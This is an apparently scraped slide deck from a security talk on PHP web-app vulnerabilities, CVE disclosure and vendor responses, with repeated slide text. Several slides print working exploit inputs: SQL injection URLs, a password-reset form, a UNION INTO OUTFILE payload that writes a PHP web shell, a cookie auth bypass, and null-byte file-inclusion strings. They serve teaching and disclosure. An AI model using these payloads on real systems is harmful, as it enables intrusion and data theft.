Its Vulnerable… Now What?      Three Diverse Tales of Woe and RemediationMark Stanislav <mark.stanislav@gmail.com>
De-Facto Quote Slide“Thank goodness the working exploitwill remain as the ‘gold standard’ forcutting through the BS in the...
The More Hats The Better
The More Hats The BetterDay Job: Linux systems administrator
The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a university
The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding we...
The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding we...
PHP Vulnerability Primer
PHP Vulnerability PrimerInputs That Get Owned:
PHP Vulnerability PrimerInputs That Get Owned:  $_GET: Query Strings    index.php?user=mstanislav
PHP Vulnerability PrimerInputs That Get Owned:  $_GET: Query Strings    index.php?user=mstanislav  $_POST: Form Submission...
PHP Vulnerability PrimerInputs That Get Owned:  $_GET: Query Strings    index.php?user=mstanislav  $_POST: Form Submission...
PHP Vulnerability Primer, cont.
PHP Vulnerability Primer, cont.Common Attacks:
PHP Vulnerability Primer, cont.Common Attacks:  Local File Inclusion (LFI)    Show me your /etc/passwd file
PHP Vulnerability Primer, cont.Common Attacks:  Local File Inclusion (LFI)    Show me your /etc/passwd file  SQL Injection ...
PHP Vulnerability Primer, cont.Common Attacks:  Local File Inclusion (LFI)    Show me your /etc/passwd file  SQL Injection ...
Tale #1 - On The Clock
Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Forex)
Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Fore...
Vulnerabilities Found
Vulnerabilities FoundAdjust ‘membership level’ of any account
Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded default
Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user p...
Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user p...
Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user p...
Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user p...
Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user p...
Clown Shoes“Something or someone that is a total joke”                             Source: Urban Dictionary; it’s legit
Code Review, Part #1
Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() {   list($level,$email) = GetVars(level,email);   DB_q...
Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() {   list($level,$email) = GetVars(level,email);   DB_q...
Code Review, Part #1Vulnerable Code function updateMembershipLevel() {    list($level,$email) = GetVars(level,email);    D...
Code Review, Part #2
Code Review, Part #2Vulnerable Codefunction updatePassword() {    list($resetkey,$pass) = PostVars(resetkey,pass1);    $ht...
Code Review, Part #2Vulnerable Codefunction updatePassword() {    list($resetkey,$pass) = PostVars(resetkey,pass1);    $ht...
Code Review, Part #2Vulnerable Codefunction updatePassword() {    list($resetkey,$pass) = PostVars(resetkey,pass1);    $ht...
Code Review, Part #3
Code Review, Part #3Vulnerable Codefunction insertUser() {    if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])...
Code Review, Part #3Vulnerable Codefunction insertUser() {    if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])...
Code Review, Part #3Vulnerable Codefunction insertUser() {    if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])...
Remediation
RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the...
RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the...
RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the...
What’s a CVE?
What’s a CVE?Common Vulnerabilities & Exposures
What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulner...
What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulner...
What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulner...
What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulner...
What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulner...
How Do I Get a CVE?
How Do I Get a CVE?1.Find the vulnerability -- score!
How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve  supposedly found: you c...
How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve  supposedly found: you c...
How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve  supposedly found: you c...
How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve  supposedly found: you c...
How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve  supposedly found: you c...
Tale #2 - The Community
Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.net
Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.netProblem: Not everyone re...
WSN Links SQL Injection
WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values all...
WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values all...
WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values all...
WSN Links Remediation
WSN Links RemediationCVE-2010-4006
WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issue
WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version releas...
WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version releas...
Pointter CMS Authentication Bypass
Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKI...
Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKI...
Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKI...
Pointter CMS Remediation
Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333
Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333  Two separate products, same vulnerability
Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333  Two separate products, same vulnerabilityNo updates have been relea...
Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333  Two separate products, same vulnerabilityNo updates have been relea...
Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333  Two separate products, same vulnerabilityNo updates have been relea...
The Swiss“Not as docile as you’d expect...”                             Source: Me; it’s legit
E-Mail Outtakes!
E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illeg...
E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illeg...
E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illeg...
E-Mail Outtakes!, cont.
E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis t...
E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis t...
Null-Byte Attack Primer
Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’
Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www...
Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www...
Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www...
Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www...
Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www...
Pulse CMS Local File Inclusion
Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) {  case $page:    include("includes/". $p...
Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) {  case $page:    include("includes/". $p...
Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) {  case $page:    include("includes/". $p...
Pulse CMS Remediation
Pulse CMS RemediationCVE-2010-4330
Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days...
Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days...
Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days...
Tale #3 - SaaS Gone Wrong
Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membership
Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membershipProblem: Your gym’s online fitness integrationweb site h...
SSO “Bypass”
SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid...
SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid...
SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid...
Vulnerability Verification
Vulnerability VerificationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anact...
Vulnerability VerificationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anact...
Information Being Disclosed
Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail Address
Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail AddressActivated A...
Remediation
RemediationContacted CEO (small company) with a report
RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: la...
RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: la...
RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: la...
Customers Notified
Customers Notified  90,000+
But be careful...
But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problem
But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t ma...
But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t ma...
But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t ma...
Generalized Take-Aways
Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten you
Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclo...
Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclo...
Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclo...
My Thoughts...
My Thoughts...Info Sec. is everyone’s responsibility
My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in ...
My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in ...
My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in ...
Thanks...Jon Oberheide - Duo SecuritySteve Christy - MITRETodd Jarvis - Packet Storm Security
ContactE-Mail: mark.stanislav@gmail.comTwitter: @markstanislavWebsite: http://www.uncompiled.com
Upcoming SlideShare
Loading in...5
×

It’s Vulnerable… Now What?: Three Tales of Woe and Remediation

1,871

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,871
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
19
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • It’s Vulnerable… Now What?: Three Tales of Woe and Remediation

    1. 1. Its Vulnerable… Now What? Three Diverse Tales of Woe and RemediationMark Stanislav <mark.stanislav@gmail.com>
    2. 2. De-Facto Quote Slide“Thank goodness the working exploitwill remain as the ‘gold standard’ forcutting through the BS in the field ofdata security for the foreseeable future.” - Marsh Ray Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit
    3. 3. The More Hats The Better
    4. 4. The More Hats The BetterDay Job: Linux systems administrator
    5. 5. The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a university
    6. 6. The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilities
    7. 7. The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilitiesSide Note: PHP programmer for ~10 years* * Quickly becoming a Ruby fiend
    8. 8. PHP Vulnerability Primer
    9. 9. PHP Vulnerability PrimerInputs That Get Owned:
    10. 10. PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav
    11. 11. PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”>
    12. 12. PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”> $_COOKIE: Cookies Chocolate Chip -- nom nom.
    13. 13. PHP Vulnerability Primer, cont.
    14. 14. PHP Vulnerability Primer, cont.Common Attacks:
    15. 15. PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file
    16. 16. PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file SQL Injection Show me your user table
    17. 17. PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file SQL Injection Show me your user table Authentication/Authorization Bypass Who needs a username or password?
    18. 18. Tale #1 - On The Clock
    19. 19. Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Forex)
    20. 20. Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Forex)Problem: Developer has no businesswriting a ‘Hello, World!’ application, letalone a web application handling creditcard data
    21. 21. Vulnerabilities Found
    22. 22. Vulnerabilities FoundAdjust ‘membership level’ of any account
    23. 23. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded default
    24. 24. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired value
    25. 25. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accounts
    26. 26. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account information
    27. 27. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account details
    28. 28. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account detailsCreate an administrative user account
    29. 29. Clown Shoes“Something or someone that is a total joke” Source: Urban Dictionary; it’s legit
    30. 30. Code Review, Part #1
    31. 31. Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}
    32. 32. Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.com
    33. 33. Code Review, Part #1Vulnerable Code function updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email"); }Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.comWhy The Code Sucks•No authentication prior to allowing execution of updateMembershipLevel()•There is no audit trail to changes being made through this function•The code does not escape or sanitize $_GET variables being passed
    34. 34. Code Review, Part #2
    35. 35. Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}
    36. 36. Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>
    37. 37. Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>•Only the password input Sucks properly, the ‘resetkey’ $_POST input is notWhy The Code is escaped•SQL doesn’t use parameterized statements to protect against general SQLinjection
    38. 38. Code Review, Part #3
    39. 39. Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}
    40. 40. Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1
    41. 41. Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1Why The Code Sucks•insertUser() method isn’t restricted from being available to unauthenticated site visitors•is_SuperUser() doesn’t affect arbitrary calls to add a user to the database•No sanitization or verification is done to any data based on $_GET variables passed
    42. 42. Remediation
    43. 43. RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.
    44. 44. RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.
    45. 45. RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.Fun Fact: The developer who wrote this codeuses the same code-base for 30+ sites currentlyonline using the same framework...
    46. 46. What’s a CVE?
    47. 47. What’s a CVE?Common Vulnerabilities & Exposures
    48. 48. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQ
    49. 49. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offerings
    50. 50. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ process
    51. 51. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to reference
    52. 52. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to referenceHelps to prevent duplication of vulnerabilities
    53. 53. How Do I Get a CVE?
    54. 54. How Do I Get a CVE?1.Find the vulnerability -- score!
    55. 55. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.
    56. 56. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)
    57. 57. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue
    58. 58. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue5.Release your advisory with the CVE included
    59. 59. How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue5.Release your advisory with the CVE included6.Provide links of publication back to MITRE
    60. 60. Tale #2 - The Community
    61. 61. Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.net
    62. 62. Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.netProblem: Not everyone releasing free (as inGNU) or paid (as in $$$) are goodprogrammers -- surprise!
    63. 63. WSN Links SQL Injection
    64. 64. WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitation
    65. 65. WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
    66. 66. WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categoriesWhy The Code Sucks•Improper sanitization of $_GET inputs within some functions of search•No explicit installation recommendation to prevent FILE privilege•Side Note: foo.php?debug=1 turns on debugging in the default installation
    67. 67. WSN Links Remediation
    68. 68. WSN Links RemediationCVE-2010-4006
    69. 69. WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issue
    70. 70. WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version released 3 days after notificationhad occurred
    71. 71. WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version released 3 days after notificationhad occurredIt would be better to actually fix all of the SQLinjection bugs (yes, there are more) rather thanusing a bandage like a UNION blacklist
    72. 72. Pointter CMS Authentication Bypass
    73. 73. Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}
    74. 74. Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.
    75. 75. Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.Why The Code Sucks•There’s no reason to store a password cookie in the first place•A session cookie should be unique and encrypted•Blank cookies should never be used as a form of authentication
    76. 76. Pointter CMS Remediation
    77. 77. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333
    78. 78. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerability
    79. 79. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issue
    80. 80. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)
    81. 81. Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)Vendor claims that the user should rename theiradmin folder to hide, erm... prevent the issue! =)
    82. 82. The Swiss“Not as docile as you’d expect...” Source: Me; it’s legit
    83. 83. E-Mail Outtakes!
    84. 84. E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”
    85. 85. E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”
    86. 86. E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”“What you are trying to do, is to find a securityhole and publish it so that everyone can hack asystem. This is the illegal part so be aware ofthis.”
    87. 87. E-Mail Outtakes!, cont.
    88. 88. E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis the same as telling someone how to build abomb.”
    89. 89. E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis the same as telling someone how to build abomb.”“Of course, it could be made safer and we knowhow to do it. But we have designed thesoftwares so that renaming admin folder givesus less work.”
    90. 90. Null-Byte Attack Primer
    91. 91. Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’
    92. 92. Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);
    93. 93. Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd
    94. 94. Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);
    95. 95. Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);index.php?file=../../../etc/passwd%00
    96. 96. Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);index.php?file=../../../etc/passwd%00 include(“/var/www/../../../etc/passwd”);
    97. 97. Pulse CMS Local File Inclusion
    98. 98. Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}
    99. 99. Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}Exploitindex.php?p=/../../../../../../../../../../../../../../etc/passwd%00
